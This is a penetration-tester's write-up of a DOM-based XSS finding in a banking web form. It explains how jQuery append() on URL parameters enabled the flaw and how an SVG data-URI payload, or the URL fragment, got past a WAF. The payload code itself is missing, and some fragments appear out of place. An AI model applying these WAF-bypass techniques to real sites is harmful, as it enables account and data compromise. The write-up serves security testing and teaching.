When you are performing a pen test or participating in a bug bounty program, sometimes you are confronted by a Web Application Firewall (WAF) designed to block malicious payloads. To properly identify and exploit a Cross-site Scripting vulnerability you will need to find a way around it! This article demonstrates a method of creating an SVG based payload to bypass those pesky WAF’s.
<use> tag inside, that linked via the href attribute to a data URI of another SVG that had been base64 encoded. After several hours of effort to get the above payload to work I realized that replacing the question mark in the URL with a hash could simplify our payload to
UPDATE 01/11/2014 : Slides from Ruxcon 2014 turbotalk can be found here
All the images below are from a replica site I made for testing and demonstration purposes. Real images could not be used due to confidentiality. However the descriptions are all based on the actual engagement.
Securus Global was tasked to perform a penetration test for a company in the banking sector on their production web application. We were given as part of the scope several forms that customers could use to apply for credit cards or request bank loans. The forms prompted you to enter in your personal information, which was then checked for validity client side and sent to the server for processing by a staff member. The immediate response for a successful application was a thank you for applying page that allowed you to download your application and gave you a reference number for your application.
When testing in a production environment that deals with real customer information, features such as money transfers and the threat of downtime, several differences in methodology have to be considered before testing commences:
Normally automated spidering tools like the one you will find in Burp Proxy or ZAP are used to aid in the initial process of information gathering. However these tools if used carelessly can present big issues when used on a production environment.
Blindly spidering a website can be dangerous because the web application may have features that are sensitive and should not be executed on a production system with real users data. As an extreme example there may be a feature that deletes a users account from the system, along with all their data. The forms were relatively simple and did not involve many pages so we opted to manually spider the site to reduce the risk of performing an action that could damage user data.
Another benefit to manually spidering a site is that you are likely to find pages that a spider will not. A good example is when spiders reach a form that requires some user input but cant progress passed the form due to entering in invalid data. Sometimes the input is straightforward text such as a first name that does not have much validation, but other inputs can be very particular. The forms provided had very specific data inputs that were heavily validated client side before the form was submitted and before we were directed to the next page. Examples include a mobile number starting with a 7 and a credit card number that had to match the companies bin number.
Just like automatic spidering, active vulnerability scanning can have the same risks to a business as mentioned above, however scanning can increase the risks in other areas such as a denial of service attack (DOS). If the scanner is blindly sending data to the server via requests aimed to exploit any potential vulnerabilities, it is common for web servers to crash or hang preventing real users from using the service. Some scanners actually test specifically for DOS vulnerabilities with the aim of bringing down the web server anyway they can.
Initial discussions with the client made it clear that bringing the website down was definitely out of the question so we opted to stick with manual testing of vulnerabilities using automated tools only to perform fuzzing of a few selected inputs. It must be noted that any testing whether its manual or automated will always have the possibility of creating a DOS of the web server. However anything you can do to minimize the risk of a production server going down the better.
The presence of a web application firewall (WAF) sitting between you and the server can also make automated tools fail. Depending on the type of WAF it can prevent common payloads and/or sanitize the inputs before it even gets to the web server. Rate limiting is also a common feature, which will slow down the number of requests coming from one IP address or completely block an IP address from making further requests. The engagement was a blackbox test and we had no information about the back end server infrastructure. However from our manual testing we had a high suspicion that they had a WAF or intrusion detection system (IDS) in place. Yet another reason manual testing was needed for this engagement.
After manually submitting the form using the fake, valid data acquired earlier I received a “thanks for applying” page as shown below. None of the forms inputs were reflected back from the server so at this point it looked like an XSS bug was out of the question.
Simplified snippet of the source code:
Going through the code we notice several interesting aspects:
Line 5: The website is using a jQuery plugin called query to extract the URL parameters. Underneath the covers its calling location.search and location.hash and does not provide any encoding or sanitization of the parsed URL parameters. So when used in conjunction with the jQuery append function mentioned below it can lead to DOM based XSS vulnerabilities.
Line 15: The jQuery append function is given user supplied data (the parsed URL parameters from the query library) which jQuery warns could introduce XSS vulnerabilities, especially when no escaping or sanitization is performed beforehand:
“Do not use these methods to insert strings obtained from untrusted sources such as URL query parameters, cookies, or form inputs. Doing so can introduce cross-site-scripting (XSS) vulnerabilities. Remove or escape any user input before adding content to the document.”
DOM based XSS
If the user inputs are accessed and used to manipulate the DOM in any way without first applying sanitization then this could lead to a DOM based XSS vulnerability.
The other major difference is that some DOM based XSS attacks don’t need to go through the server to be exploitable. This can happen when using the hash (#) part of a URL called the fragment. Any parameters after the hash are not sent to the server during a HTTP request. For a detailed explanation of DOM based XSS with some basic examples, this article written in 2005 by Amit Klein is a good place to start.
Having read the code and understanding how the page is parsing and using the URL parameters it was time to start testing out some basic payloads. But first the location of out payload should be identified from the URL below:
To verify that this parameter is indeed vulnerable we can write something like this:
This should make the reference ID underlined.
The underlined refid demonstrates that the server does either minimal filtering or no filtering of URL parameters.
After trying several other more complex payloads nothing seemed to work. It seemed to be a WAF that was filtering certain expressions. Some examples of the strings it was filtering were:
- All event handlers such as
- The data attribute
- And many more
More research was necessary to come up with a payload that would bypass the WAF’s filter. This turned out to be the Data URL.
“Used to embed small items of data into a URL—rather than link to an external resource, the URL contains the actual encoded data. URIs are supported by most modern browsers except for some versions of Internet Explorer.”
Where the base64 encoded part is:
Unfortunately the object tag and data attribute are also included in the WAF’s filtering so this payload failed too.
Where the encoded part is:
The Final Payload
Base64 encoded data URI:
Payload executing the alert:
SVG Payload Explained
Stepping through the payload, notice its embedding an SVG into another SVG utilizing the
<use> and data URI concept mentioned earlier. The
<use> tag is one of only a handful of acceptable tags that you can use when constructing an SVG image with the
<svg> tag. Below are the tags that can be used:
<use> tag has an attribute called xlink:href which link to another file. In this case it is linking to an inline SVG. The #rectangle at the end of the base64 encoded string specifies the ID of the element within the data URI that we are linking too.
<embed> tag was chosen.
The Easier way
After all that hard work trying to bypass their WAF to successfully exploit the XSS vulnerability and the hours of research that went into creating a complex payload it turned out to be completely unnecessary and a much simpler way was possible.
The URL fragment identifier was the key to this simpler technique. More commonly known as the hash bag (#!) in modern single page web apps. It is used amongst other things to save the state of a web application so that users can bookmark a page and come back to where they left off. The difference between the query string (anything after the question mark (?) ) and the fragment identifier is that anything after the hash is not sent to the server in the http request.